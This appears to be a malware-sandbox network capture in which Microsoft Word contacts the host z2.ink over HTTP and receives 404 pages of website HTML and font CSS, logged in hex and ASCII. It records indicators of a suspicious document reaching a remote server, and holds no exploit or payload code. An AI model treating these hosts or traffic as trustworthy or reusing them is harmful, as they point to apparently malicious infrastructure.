May 27, 2024 18:35:12.002831936 CEST	1236	IN	Data Raw: 09 20 20 20 20 09 09 09 20 09 09 34 34 30 20 20 09 20 20 20 20 20 20 20 20 09 09 20 20 20 20 09 09 09 20 09 09 33 38 35 30 38 37 09 20 20 09 09 20 20 09 20 09 09 09 09 20 20 20 20 09 09 09 20 09 09 30 09 20 20 09 09 20 20 09 20 09 09 09 09 20 20 Data Ascii: 440 385087 0 c0 d41b704c 71 4ca96 a48
May 27, 2024 18:35:12.002868891 CEST	1236	IN	Data Raw: 20 09 09 20 20 09 09 32 0a 0d 0a 0a 0a 0a 0a 0d 31 09 09 09 20 20 09 20 09 09 20 20 09 20 09 20 09 20 09 09 20 20 09 09 61 09 20 09 20 20 20 20 20 20 09 09 20 20 20 09 09 09 20 20 20 20 09 09 38 09 09 20 20 09 20 20 20 20 09 09 09 20 20 09 09 09 Data Ascii: 21 a 8 c 276669 1ad2 320 e1ea18
May 27, 2024 18:35:12.007945061 CEST	1236	IN	Data Raw: 09 09 09 09 09 09 20 20 09 20 09 39 0a 0d 0d 0a 0d 0d 0d 0a 31 31 0a 0d 0d 0a 0d 0d 0d 0a 63 20 20 09 09 09 20 09 09 20 20 20 09 20 20 09 20 20 09 09 20 09 20 09 34 0d 0d 0d 0a 0d 0d 0d 0a 65 30 65 0a 0a 0d 0a 0d 0d 0d 0a 36 62 0d 0a 0a 0a 0a 0a Data Ascii: 911c 4e0e6b1fc8ce e2 40 adb1d 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49163	54.241.153.192	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:13.028472900 CEST	128	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: z2.ink Content-Length: 0 Connection: Keep-Alive
May 27, 2024 18:35:13.630913973 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Date: Mon, 27 May 2024 16:35:13 GMT Content-Length: 102317 Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/<![CDATA[//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&subset=latin,latin-ext&display=swap // User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
May 27, 2024 18:35:13.630934000 CEST	224	IN	Data Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
May 27, 2024 18:35:13.631000042 CEST	1236	IN	Data Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
May 27, 2024 18:35:13.631078959 CEST	1236	IN	Data Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
May 27, 2024 18:35:13.631094933 CEST	1236	IN	Data Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
May 27, 2024 18:35:13.631287098 CEST	1236	IN	Data Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
May 27, 2024 18:35:13.631303072 CEST	1236	IN	Data Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
May 27, 2024 18:35:13.631326914 CEST	1236	IN	Data Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77 Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
May 27, 2024 18:35:13.631530046 CEST	1236	IN	Data Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 Data Ascii: &subset=latin&display=swap // User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
May 27, 2024 18:35:13.631546974 CEST	1236	IN	Data Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
May 27, 2024 18:35:13.636672020 CEST	1236	IN	Data Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49164	54.241.153.192	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:14.116738081 CEST	128	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: z2.ink Content-Length: 0 Connection: Keep-Alive
May 27, 2024 18:35:14.713757992 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Date: Mon, 27 May 2024 16:35:14 GMT Content-Length: 102317 Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/<![CDATA[//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&subset=latin,latin-ext&display=swap // User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
May 27, 2024 18:35:14.713804007 CEST	224	IN	Data Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
May 27, 2024 18:35:14.713840008 CEST	1236	IN	Data Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
May 27, 2024 18:35:14.713918924 CEST	1236	IN	Data Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
May 27, 2024 18:35:14.713953018 CEST	1236	IN	Data Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
May 27, 2024 18:35:14.713987112 CEST	672	IN	Data Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
May 27, 2024 18:35:14.714020967 CEST	1236	IN	Data Raw: 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 67 2d 31 78 34 75 61 56 51 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 Data Ascii: mSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVQ.woff) format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 800;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/
May 27, 2024 18:35:14.714056015 CEST	1236	IN	Data Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkyFjWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 80
May 27, 2024 18:35:14.714090109 CEST	1236	IN	Data Raw: 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 Data Ascii: font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight:
May 27, 2024 18:35:14.714127064 CEST	1236	IN	Data Raw: 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6f 78 2f 33 39 2e 30 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 6f 74 6f 6e 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 Data Ascii: 20100101 Firefox/39.0 /@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/monoton/v15/5h1aiZUrOngCibe4TkHLQg.woff2) format('woff2');}/...*/</style><script>let jquery
May 27, 2024 18:35:14.719958067 CEST	1236	IN	Data Raw: 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 3c 6d 65 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 Data Ascii: taproperty="og:type" content="article"><metaproperty="og:title" content="Not Found - Brandlink Edge"><metaproperty="og:url" content="https://face.linksgpt.com/edge/?p=28"><metaproperty="og:site_name" content="Brandlink Edge"><metaproperty

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49165	54.241.153.192	80	1020	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:35:14.886816978 CEST	128	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: z2.ink Content-Length: 0 Connection: Keep-Alive
May 27, 2024 18:35:15.506062984 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Edge: smart-1.high-performance.network Date: Mon, 27 May 2024 16:35:15 GMT Content-Length: 102317 Server: LINKSGPT Cache-Control: no-store, no-cache, must-revalidate Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/<![CDATA[//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&subset=latin,latin-ext&display=swap // User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
May 27, 2024 18:35:15.506138086 CEST	224	IN	Data Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
May 27, 2024 18:35:15.506174088 CEST	1236	IN	Data Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
May 27, 2024 18:35:15.506280899 CEST	1236	IN	Data Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
May 27, 2024 18:35:15.506315947 CEST	1236	IN	Data Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
May 27, 2024 18:35:15.506469011 CEST	1236	IN	Data Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
